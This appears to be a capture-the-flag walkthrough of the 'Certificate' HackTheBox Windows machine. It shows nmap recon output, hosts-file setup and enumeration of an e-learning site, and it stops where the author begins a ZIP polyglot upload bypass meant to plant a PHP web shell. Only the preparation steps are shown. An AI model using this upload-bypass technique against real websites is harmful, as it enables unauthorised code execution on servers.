Post

Certificate

Certificate
MachineDifficultyOSRelease
CertificateHardWindows01 Jun 2025Logo

Recon

Start of with Nmap Scan

1
2
3
4
5
6
7
IP=10.10.11.71

# Find open ports (fast full-port scan) and build a comma-separated list
port=$(sudo nmap -p- $IP --min-rate 10000 | grep open | cut -d'/' -f1 | tr '\n' ',' )

# Run an Nmap service/version scan with default scripts against discovered ports
sudo nmap -sC -sV -vv -p $port $IP -oN certificate.scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-04 05:52 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 05:52
Completed NSE at 05:52, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 05:52
Completed NSE at 05:52, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 05:52
Completed NSE at 05:52, 0.00s elapsed
Initiating Ping Scan at 05:52
Scanning 10.10.11.71 [4 ports]
Completed Ping Scan at 05:52, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 05:52
Completed Parallel DNS resolution of 1 host. at 05:52, 0.00s elapsed
Initiating SYN Stealth Scan at 05:52
Scanning 10.10.11.71 [21 ports]
Discovered open port 135/tcp on 10.10.11.71
Discovered open port 139/tcp on 10.10.11.71
Discovered open port 80/tcp on 10.10.11.71
Discovered open port 53/tcp on 10.10.11.71
Discovered open port 445/tcp on 10.10.11.71
Discovered open port 49689/tcp on 10.10.11.71
Discovered open port 9389/tcp on 10.10.11.71
Discovered open port 593/tcp on 10.10.11.71
Discovered open port 49692/tcp on 10.10.11.71
Discovered open port 389/tcp on 10.10.11.71
Discovered open port 49667/tcp on 10.10.11.71
Discovered open port 49713/tcp on 10.10.11.71
Discovered open port 49707/tcp on 10.10.11.71
Discovered open port 636/tcp on 10.10.11.71
Discovered open port 5985/tcp on 10.10.11.71
Discovered open port 49732/tcp on 10.10.11.71
Discovered open port 49690/tcp on 10.10.11.71
Discovered open port 3268/tcp on 10.10.11.71
Discovered open port 3269/tcp on 10.10.11.71
Discovered open port 88/tcp on 10.10.11.71
Discovered open port 464/tcp on 10.10.11.71
Completed SYN Stealth Scan at 05:52, 0.52s elapsed (21 total ports)
Initiating Service scan at 05:52
Scanning 21 services on 10.10.11.71
Completed Service scan at 05:53, 58.05s elapsed (21 services on 1 host)
NSE: Script scanning 10.10.11.71.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 05:53
NSE Timing: About 99.97% done; ETC: 05:53 (0:00:00 remaining)
Completed NSE at 05:53, 40.23s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 05:53
Completed NSE at 05:53, 3.71s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 05:53
Completed NSE at 05:53, 0.00s elapsed
Nmap scan report for 10.10.11.71
Host is up, received echo-reply ttl 127 (0.25s latency).
Scanned at 2025-10-04 05:52:16 EDT for 103s

PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.0.30)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://certificate.htb/
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-10-04 17:52:38Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Issuer: commonName=Certificate-LTD-CA/domainComponent=certificate
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-03T19:51:30
| Not valid after:  2026-10-03T19:51:30
| MD5:   4342:226a:144f:5de3:d4a2:2e33:3bef:9b28
| SHA-1: 0e36:4eee:32cd:0b5f:f481:1e01:17ee:6520:7739:3103
| -----BEGIN CERTIFICATE-----
| MIIGTDCCBTSgAwIBAgITWAAAABj/YVrbl3kscQAAAAAAGDANBgkqhkiG9w0BAQsF
| ADBPMRMwEQYKCZImiZPyLGQBGRYDaHRiMRswGQYKCZImiZPyLGQBGRYLY2VydGlm
| aWNhdGUxGzAZBgNVBAMTEkNlcnRpZmljYXRlLUxURC1DQTAeFw0yNTEwMDMxOTUx
| MzBaFw0yNjEwMDMxOTUxMzBaMB8xHTAbBgNVBAMTFERDMDEuY2VydGlmaWNhdGUu
| aHRiMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxIfu3iy2riEDEGJf
| MyauOyWs61rnOzs1VTCotCBMsf56w01kvY/eUVe0+nzd7u9zqGgdFuMBWq2482ef
| 6QEt9ba3jbo22cJkdS+/pAiO1K5s+cQmaSZ+GSpJOPJrNtK4ZDkEcIQGJeaBUNP+
| n34RVTUJxfzCeUeSQQPCz6yBbAvModAqUWiFasTePw2Kxt1D6y2/59JPN88iH2j3
| 4zcBK7OUE7TUes591a6qdgZ4CWBaoyVp8WOPm7YdMoB0Qw2FejWZDh6agG2ZP9Z+
| 1e6IYwP+OzJd2FbKnpGpWL3ImXKDeyhRkX0v3LWOwwbVqVonNOP4NgJx1X0EyHAP
| cvXYaQIDAQABo4IDTzCCA0swLwYJKwYBBAGCNxQCBCIeIABEAG8AbQBhAGkAbgBD
| AG8AbgB0AHIAbwBsAGwAZQByMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcD
| ATAOBgNVHQ8BAf8EBAMCBaAweAYJKoZIhvcNAQkPBGswaTAOBggqhkiG9w0DAgIC
| AIAwDgYIKoZIhvcNAwQCAgCAMAsGCWCGSAFlAwQBKjALBglghkgBZQMEAS0wCwYJ
| YIZIAWUDBAECMAsGCWCGSAFlAwQBBTAHBgUrDgMCBzAKBggqhkiG9w0DBzBOBgkr
| BgEEAYI3GQIEQTA/oD0GCisGAQQBgjcZAgGgLwQtUy0xLTUtMjEtNTE1NTM3NjY5
| LTQyMjM2ODcxOTYtMzI0OTY5MDU4My0xMDAwMEAGA1UdEQQ5MDegHwYJKwYBBAGC
| NxkBoBIEEAdHN3ziVeJEnb0gcZhtQbWCFERDMDEuY2VydGlmaWNhdGUuaHRiMB0G
| A1UdDgQWBBRoKzp6gpXRf4sPitxex+b8/yuUuDAfBgNVHSMEGDAWgBQ64fdRbe+t
| Shh3QaO7u4XmbpRzojCB0QYDVR0fBIHJMIHGMIHDoIHAoIG9hoG6bGRhcDovLy9D
| Tj1DZXJ0aWZpY2F0ZS1MVEQtQ0EsQ049REMwMSxDTj1DRFAsQ049UHVibGljJTIw
| S2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1j
| ZXJ0aWZpY2F0ZSxEQz1odGI/Y2VydGlmaWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNl
| P29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlvblBvaW50MIHIBggrBgEFBQcBAQSB
| uzCBuDCBtQYIKwYBBQUHMAKGgahsZGFwOi8vL0NOPUNlcnRpZmljYXRlLUxURC1D
| QSxDTj1BSUEsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMs
| Q049Q29uZmlndXJhdGlvbixEQz1jZXJ0aWZpY2F0ZSxEQz1odGI/Y0FDZXJ0aWZp
| Y2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmljYXRpb25BdXRob3JpdHkwDQYJ
| KoZIhvcNAQELBQADggEBAIg822zMA962RVTV/89kqTam/PXn2vsxz4Xejcsnbaoq
| maU9S3ANppzGLOnPaGH/N0m/SFqtkzQn4oU3UhFRTlPxay1oV/+618E1XFCUd3/2
| aFSH5DAgDBTiq0lKlRWLPpLzwlgwexsy53EuxjrVy9p/TJiLiaNqmsm1sMH6yLgm
| 80s/DIMjfgPp3vo3emtrwjCcK0H8rNOTIVLNXDbfVzvhqoxJZdJ4aR8vejYI/ovt
| 3KuP3Xm57ROI9Hft7Ro8JRhYZsRYGha0usr8YIPNrG5XzpMEWYB+u9hFUHCpGmsr
| BKUozIHj2A3VPYkCbXbHZBsJqN9rQHxLCNuON1Kn2cU=
|_-----END CERTIFICATE-----
|_ssl-date: 2025-10-04T17:54:11+00:00; +8h00m14s from scanner time.
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-10-04T17:54:12+00:00; +8h00m14s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Issuer: commonName=Certificate-LTD-CA/domainComponent=certificate
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-03T19:51:30
| Not valid after:  2026-10-03T19:51:30
| MD5:   4342:226a:144f:5de3:d4a2:2e33:3bef:9b28
| SHA-1: 0e36:4eee:32cd:0b5f:f481:1e01:17ee:6520:7739:3103
| -----BEGIN CERTIFICATE-----
| MIIGTDCCBTSgAwIBAgITWAAAABj/YVrbl3kscQAAAAAAGDANBgkqhkiG9w0BAQsF
| ADBPMRMwEQYKCZImiZPyLGQBGRYDaHRiMRswGQYKCZImiZPyLGQBGRYLY2VydGlm
| aWNhdGUxGzAZBgNVBAMTEkNlcnRpZmljYXRlLUxURC1DQTAeFw0yNTEwMDMxOTUx
| MzBaFw0yNjEwMDMxOTUxMzBaMB8xHTAbBgNVBAMTFERDMDEuY2VydGlmaWNhdGUu
| aHRiMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxIfu3iy2riEDEGJf
| MyauOyWs61rnOzs1VTCotCBMsf56w01kvY/eUVe0+nzd7u9zqGgdFuMBWq2482ef
| 6QEt9ba3jbo22cJkdS+/pAiO1K5s+cQmaSZ+GSpJOPJrNtK4ZDkEcIQGJeaBUNP+
| n34RVTUJxfzCeUeSQQPCz6yBbAvModAqUWiFasTePw2Kxt1D6y2/59JPN88iH2j3
| 4zcBK7OUE7TUes591a6qdgZ4CWBaoyVp8WOPm7YdMoB0Qw2FejWZDh6agG2ZP9Z+
| 1e6IYwP+OzJd2FbKnpGpWL3ImXKDeyhRkX0v3LWOwwbVqVonNOP4NgJx1X0EyHAP
| cvXYaQIDAQABo4IDTzCCA0swLwYJKwYBBAGCNxQCBCIeIABEAG8AbQBhAGkAbgBD
| AG8AbgB0AHIAbwBsAGwAZQByMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcD
| ATAOBgNVHQ8BAf8EBAMCBaAweAYJKoZIhvcNAQkPBGswaTAOBggqhkiG9w0DAgIC
| AIAwDgYIKoZIhvcNAwQCAgCAMAsGCWCGSAFlAwQBKjALBglghkgBZQMEAS0wCwYJ
| YIZIAWUDBAECMAsGCWCGSAFlAwQBBTAHBgUrDgMCBzAKBggqhkiG9w0DBzBOBgkr
| BgEEAYI3GQIEQTA/oD0GCisGAQQBgjcZAgGgLwQtUy0xLTUtMjEtNTE1NTM3NjY5
| LTQyMjM2ODcxOTYtMzI0OTY5MDU4My0xMDAwMEAGA1UdEQQ5MDegHwYJKwYBBAGC
| NxkBoBIEEAdHN3ziVeJEnb0gcZhtQbWCFERDMDEuY2VydGlmaWNhdGUuaHRiMB0G
| A1UdDgQWBBRoKzp6gpXRf4sPitxex+b8/yuUuDAfBgNVHSMEGDAWgBQ64fdRbe+t
| Shh3QaO7u4XmbpRzojCB0QYDVR0fBIHJMIHGMIHDoIHAoIG9hoG6bGRhcDovLy9D
| Tj1DZXJ0aWZpY2F0ZS1MVEQtQ0EsQ049REMwMSxDTj1DRFAsQ049UHVibGljJTIw
| S2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1j
| ZXJ0aWZpY2F0ZSxEQz1odGI/Y2VydGlmaWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNl
| P29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlvblBvaW50MIHIBggrBgEFBQcBAQSB
| uzCBuDCBtQYIKwYBBQUHMAKGgahsZGFwOi8vL0NOPUNlcnRpZmljYXRlLUxURC1D
| QSxDTj1BSUEsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMs
| Q049Q29uZmlndXJhdGlvbixEQz1jZXJ0aWZpY2F0ZSxEQz1odGI/Y0FDZXJ0aWZp
| Y2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmljYXRpb25BdXRob3JpdHkwDQYJ
| KoZIhvcNAQELBQADggEBAIg822zMA962RVTV/89kqTam/PXn2vsxz4Xejcsnbaoq
| maU9S3ANppzGLOnPaGH/N0m/SFqtkzQn4oU3UhFRTlPxay1oV/+618E1XFCUd3/2
| aFSH5DAgDBTiq0lKlRWLPpLzwlgwexsy53EuxjrVy9p/TJiLiaNqmsm1sMH6yLgm
| 80s/DIMjfgPp3vo3emtrwjCcK0H8rNOTIVLNXDbfVzvhqoxJZdJ4aR8vejYI/ovt
| 3KuP3Xm57ROI9Hft7Ro8JRhYZsRYGha0usr8YIPNrG5XzpMEWYB+u9hFUHCpGmsr
| BKUozIHj2A3VPYkCbXbHZBsJqN9rQHxLCNuON1Kn2cU=
|_-----END CERTIFICATE-----
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-10-04T17:54:11+00:00; +8h00m14s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Issuer: commonName=Certificate-LTD-CA/domainComponent=certificate
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-03T19:51:30
| Not valid after:  2026-10-03T19:51:30
| MD5:   4342:226a:144f:5de3:d4a2:2e33:3bef:9b28
| SHA-1: 0e36:4eee:32cd:0b5f:f481:1e01:17ee:6520:7739:3103
| -----BEGIN CERTIFICATE-----
| MIIGTDCCBTSgAwIBAgITWAAAABj/YVrbl3kscQAAAAAAGDANBgkqhkiG9w0BAQsF
| ADBPMRMwEQYKCZImiZPyLGQBGRYDaHRiMRswGQYKCZImiZPyLGQBGRYLY2VydGlm
| aWNhdGUxGzAZBgNVBAMTEkNlcnRpZmljYXRlLUxURC1DQTAeFw0yNTEwMDMxOTUx
| MzBaFw0yNjEwMDMxOTUxMzBaMB8xHTAbBgNVBAMTFERDMDEuY2VydGlmaWNhdGUu
| aHRiMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxIfu3iy2riEDEGJf
| MyauOyWs61rnOzs1VTCotCBMsf56w01kvY/eUVe0+nzd7u9zqGgdFuMBWq2482ef
| 6QEt9ba3jbo22cJkdS+/pAiO1K5s+cQmaSZ+GSpJOPJrNtK4ZDkEcIQGJeaBUNP+
| n34RVTUJxfzCeUeSQQPCz6yBbAvModAqUWiFasTePw2Kxt1D6y2/59JPN88iH2j3
| 4zcBK7OUE7TUes591a6qdgZ4CWBaoyVp8WOPm7YdMoB0Qw2FejWZDh6agG2ZP9Z+
| 1e6IYwP+OzJd2FbKnpGpWL3ImXKDeyhRkX0v3LWOwwbVqVonNOP4NgJx1X0EyHAP
| cvXYaQIDAQABo4IDTzCCA0swLwYJKwYBBAGCNxQCBCIeIABEAG8AbQBhAGkAbgBD
| AG8AbgB0AHIAbwBsAGwAZQByMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcD
| ATAOBgNVHQ8BAf8EBAMCBaAweAYJKoZIhvcNAQkPBGswaTAOBggqhkiG9w0DAgIC
| AIAwDgYIKoZIhvcNAwQCAgCAMAsGCWCGSAFlAwQBKjALBglghkgBZQMEAS0wCwYJ
| YIZIAWUDBAECMAsGCWCGSAFlAwQBBTAHBgUrDgMCBzAKBggqhkiG9w0DBzBOBgkr
| BgEEAYI3GQIEQTA/oD0GCisGAQQBgjcZAgGgLwQtUy0xLTUtMjEtNTE1NTM3NjY5
| LTQyMjM2ODcxOTYtMzI0OTY5MDU4My0xMDAwMEAGA1UdEQQ5MDegHwYJKwYBBAGC
| NxkBoBIEEAdHN3ziVeJEnb0gcZhtQbWCFERDMDEuY2VydGlmaWNhdGUuaHRiMB0G
| A1UdDgQWBBRoKzp6gpXRf4sPitxex+b8/yuUuDAfBgNVHSMEGDAWgBQ64fdRbe+t
| Shh3QaO7u4XmbpRzojCB0QYDVR0fBIHJMIHGMIHDoIHAoIG9hoG6bGRhcDovLy9D
| Tj1DZXJ0aWZpY2F0ZS1MVEQtQ0EsQ049REMwMSxDTj1DRFAsQ049UHVibGljJTIw
| S2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1j
| ZXJ0aWZpY2F0ZSxEQz1odGI/Y2VydGlmaWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNl
| P29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlvblBvaW50MIHIBggrBgEFBQcBAQSB
| uzCBuDCBtQYIKwYBBQUHMAKGgahsZGFwOi8vL0NOPUNlcnRpZmljYXRlLUxURC1D
| QSxDTj1BSUEsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMs
| Q049Q29uZmlndXJhdGlvbixEQz1jZXJ0aWZpY2F0ZSxEQz1odGI/Y0FDZXJ0aWZp
| Y2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmljYXRpb25BdXRob3JpdHkwDQYJ
| KoZIhvcNAQELBQADggEBAIg822zMA962RVTV/89kqTam/PXn2vsxz4Xejcsnbaoq
| maU9S3ANppzGLOnPaGH/N0m/SFqtkzQn4oU3UhFRTlPxay1oV/+618E1XFCUd3/2
| aFSH5DAgDBTiq0lKlRWLPpLzwlgwexsy53EuxjrVy9p/TJiLiaNqmsm1sMH6yLgm
| 80s/DIMjfgPp3vo3emtrwjCcK0H8rNOTIVLNXDbfVzvhqoxJZdJ4aR8vejYI/ovt
| 3KuP3Xm57ROI9Hft7Ro8JRhYZsRYGha0usr8YIPNrG5XzpMEWYB+u9hFUHCpGmsr
| BKUozIHj2A3VPYkCbXbHZBsJqN9rQHxLCNuON1Kn2cU=
|_-----END CERTIFICATE-----
3269/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-10-04T17:54:12+00:00; +8h00m14s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Issuer: commonName=Certificate-LTD-CA/domainComponent=certificate
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-03T19:51:30
| Not valid after:  2026-10-03T19:51:30
| MD5:   4342:226a:144f:5de3:d4a2:2e33:3bef:9b28
| SHA-1: 0e36:4eee:32cd:0b5f:f481:1e01:17ee:6520:7739:3103
| -----BEGIN CERTIFICATE-----
| MIIGTDCCBTSgAwIBAgITWAAAABj/YVrbl3kscQAAAAAAGDANBgkqhkiG9w0BAQsF
| ADBPMRMwEQYKCZImiZPyLGQBGRYDaHRiMRswGQYKCZImiZPyLGQBGRYLY2VydGlm
| aWNhdGUxGzAZBgNVBAMTEkNlcnRpZmljYXRlLUxURC1DQTAeFw0yNTEwMDMxOTUx
| MzBaFw0yNjEwMDMxOTUxMzBaMB8xHTAbBgNVBAMTFERDMDEuY2VydGlmaWNhdGUu
| aHRiMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxIfu3iy2riEDEGJf
| MyauOyWs61rnOzs1VTCotCBMsf56w01kvY/eUVe0+nzd7u9zqGgdFuMBWq2482ef
| 6QEt9ba3jbo22cJkdS+/pAiO1K5s+cQmaSZ+GSpJOPJrNtK4ZDkEcIQGJeaBUNP+
| n34RVTUJxfzCeUeSQQPCz6yBbAvModAqUWiFasTePw2Kxt1D6y2/59JPN88iH2j3
| 4zcBK7OUE7TUes591a6qdgZ4CWBaoyVp8WOPm7YdMoB0Qw2FejWZDh6agG2ZP9Z+
| 1e6IYwP+OzJd2FbKnpGpWL3ImXKDeyhRkX0v3LWOwwbVqVonNOP4NgJx1X0EyHAP
| cvXYaQIDAQABo4IDTzCCA0swLwYJKwYBBAGCNxQCBCIeIABEAG8AbQBhAGkAbgBD
| AG8AbgB0AHIAbwBsAGwAZQByMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcD
| ATAOBgNVHQ8BAf8EBAMCBaAweAYJKoZIhvcNAQkPBGswaTAOBggqhkiG9w0DAgIC
| AIAwDgYIKoZIhvcNAwQCAgCAMAsGCWCGSAFlAwQBKjALBglghkgBZQMEAS0wCwYJ
| YIZIAWUDBAECMAsGCWCGSAFlAwQBBTAHBgUrDgMCBzAKBggqhkiG9w0DBzBOBgkr
| BgEEAYI3GQIEQTA/oD0GCisGAQQBgjcZAgGgLwQtUy0xLTUtMjEtNTE1NTM3NjY5
| LTQyMjM2ODcxOTYtMzI0OTY5MDU4My0xMDAwMEAGA1UdEQQ5MDegHwYJKwYBBAGC
| NxkBoBIEEAdHN3ziVeJEnb0gcZhtQbWCFERDMDEuY2VydGlmaWNhdGUuaHRiMB0G
| A1UdDgQWBBRoKzp6gpXRf4sPitxex+b8/yuUuDAfBgNVHSMEGDAWgBQ64fdRbe+t
| Shh3QaO7u4XmbpRzojCB0QYDVR0fBIHJMIHGMIHDoIHAoIG9hoG6bGRhcDovLy9D
| Tj1DZXJ0aWZpY2F0ZS1MVEQtQ0EsQ049REMwMSxDTj1DRFAsQ049UHVibGljJTIw
| S2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1j
| ZXJ0aWZpY2F0ZSxEQz1odGI/Y2VydGlmaWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNl
| P29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlvblBvaW50MIHIBggrBgEFBQcBAQSB
| uzCBuDCBtQYIKwYBBQUHMAKGgahsZGFwOi8vL0NOPUNlcnRpZmljYXRlLUxURC1D
| QSxDTj1BSUEsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMs
| Q049Q29uZmlndXJhdGlvbixEQz1jZXJ0aWZpY2F0ZSxEQz1odGI/Y0FDZXJ0aWZp
| Y2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmljYXRpb25BdXRob3JpdHkwDQYJ
| KoZIhvcNAQELBQADggEBAIg822zMA962RVTV/89kqTam/PXn2vsxz4Xejcsnbaoq
| maU9S3ANppzGLOnPaGH/N0m/SFqtkzQn4oU3UhFRTlPxay1oV/+618E1XFCUd3/2
| aFSH5DAgDBTiq0lKlRWLPpLzwlgwexsy53EuxjrVy9p/TJiLiaNqmsm1sMH6yLgm
| 80s/DIMjfgPp3vo3emtrwjCcK0H8rNOTIVLNXDbfVzvhqoxJZdJ4aR8vejYI/ovt
| 3KuP3Xm57ROI9Hft7Ro8JRhYZsRYGha0usr8YIPNrG5XzpMEWYB+u9hFUHCpGmsr
| BKUozIHj2A3VPYkCbXbHZBsJqN9rQHxLCNuON1Kn2cU=
|_-----END CERTIFICATE-----
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49689/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49690/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49692/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49707/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49713/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49732/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: Hosts: certificate.htb, DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 50770/tcp): CLEAN (Timeout)
|   Check 2 (port 49602/tcp): CLEAN (Timeout)
|   Check 3 (port 43669/udp): CLEAN (Timeout)
|   Check 4 (port 15156/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time: 
|   date: 2025-10-04T17:53:32
|_  start_date: N/A
|_clock-skew: mean: 8h00m13s, deviation: 0s, median: 8h00m13s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 05:53
Completed NSE at 05:53, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 05:53
Completed NSE at 05:53, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 05:53
Completed NSE at 05:53, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 104.32 seconds
           Raw packets sent: 25 (1.076KB) | Rcvd: 22 (952B)

The Nmap scan revealed that the target hosts both an Active Directory environment and a web service. The numerous AD-related ports confirm a Windows domain setup, while port 80 hosts a website accessible at http://certificate.htb/.

Before proceeding, we update the /etc/hosts file to resolve the domain properly.

1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~/HTB/Certificate]
└─$ netexec smb 10.10.11.71 --generate-hosts-file certificate-hosts
SMB         10.10.11.71     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certificate.htb) (signing:True) (SMBv1:False)
                                                                                                                              
┌──(kali㉿kali)-[~/HTB/Certificate]
└─$ cat certificate-hosts 
10.10.11.71     DC01.certificate.htb certificate.htb DC01
                                                                                                                              
┌──(kali㉿kali)-[~/HTB/Certificate]
└─$ sudo tee -a /etc/hosts < certificate-hosts

10.10.11.71     DC01.certificate.htb certificate.htb DC01

Enumeration

here we have a webserver running on port 80

1
http://certificate.htb/

Error loading image

The website appears to be an e-learning platform offering online courses, certifications, and educational resources. It provides features such as video classes, e-books, assignments, and recognized certificates to help users enhance their skills.

First, we register on the platform:

1
http://certificate.htb/register.php

Error loading image

Then, log in to the application:

1
http://certificate.htb/login.php

Error loading image

Next, we explore the available courses:

1
http://certificate.htb/courses.php

Here, we can view and enroll in different courses.

Error loading image

To view course details and enroll:

1
http://certificate.htb/course-details.php?id=1

Click Enroll to join the course.

Error loading image

After enrolling, scrolling down reveals different sessions and a submission section.

1
http://certificate.htb/course-details.php?id=1&action=enroll

Error loading image

Clicking on Submission leads to a file upload page that accepts only specific file types:

1
2
3
We accept only the following file types: .pdf, .docx, .pptx, .xlsx

http://certificate.htb/upload.php?s_id=26

Here, uploading a normal PDF shows “File uploaded successfully” and provides a link to view the submitted assignment:

Error loading image

Here after trying different type of file upload finally i found a upload a shell

ZIP-overlay (polyglot) upload — Initial access via web shell

Overview: by creating a ZIP/polyglot archive that contains both a benign PDF and a PHP web shell, the application accepted the upload and stored the shell, allowing initial code execution.

Preparation (create a sample PDF)

  • Create a simple text file and convert it to PDF:
1
2
echo "hello world" > newfile.txt
pandoc newfile.txt -o normal.pdf
  • Create a benign ZIP containing the PDF:
1
zip benign.zip normal.pdf
